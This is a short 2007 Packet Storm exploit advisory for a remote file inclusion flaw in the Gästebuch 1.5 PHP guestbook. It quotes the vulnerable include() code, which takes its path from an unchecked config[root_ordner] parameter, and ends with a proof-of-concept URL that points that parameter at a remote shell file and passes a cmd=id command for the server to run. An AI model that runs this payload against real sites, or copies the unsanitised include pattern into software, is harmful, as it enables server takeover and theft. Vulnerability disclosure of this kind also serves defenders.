gastebuch-rfi.txt

2007-08-11T00:00:00
ID PACKETSTORM:58440
Type packetstorm
Reporter Rizgar
Modified 2007-08-11T00:00:00

Description

                                        
                                            `Gästebuch Version 1.5 Remote Command Execution Vulnerability   
-----------------------------------------------------------------------  
  
  
Script : Gästebuch Version   
  
Version : 1.5  
  
Site : http://www.mapos-scripts.de/downloads.php?download=11  
  
Founder : Rizgar  
  
Contact : rizgar@linuxmail.org and irc.gigachat.net #kurdhack   
  
Thanks : KHC, PH , ColdHackers, and my brothers, b0tan, b3g0k and nisto :) my heros :]  
  
-----------------------------------------------------------------------  
  
  
  
<?php  
session_start();  
include($config["root_ordner"].'config.php');  
if (file_exists($root_ordner.'install.php'))   
{  
echo "<meta http-equiv='refresh' content='0;URL=install.php'>";  
exit;  
}  
include($config["root_ordner"].'includes/dbconnect.php');  
include($config["root_ordner"].'includes/function.php');  
include($config["root_ordner"].'includes/captcha.php');  
$header = style('index_body','header');  
echo $header;  
  
...  
  
?>  
  
PoC :   
  
http://www.site.com/path/index.php?config[root_ordner]=http://shell.txt?&cmd=id  
`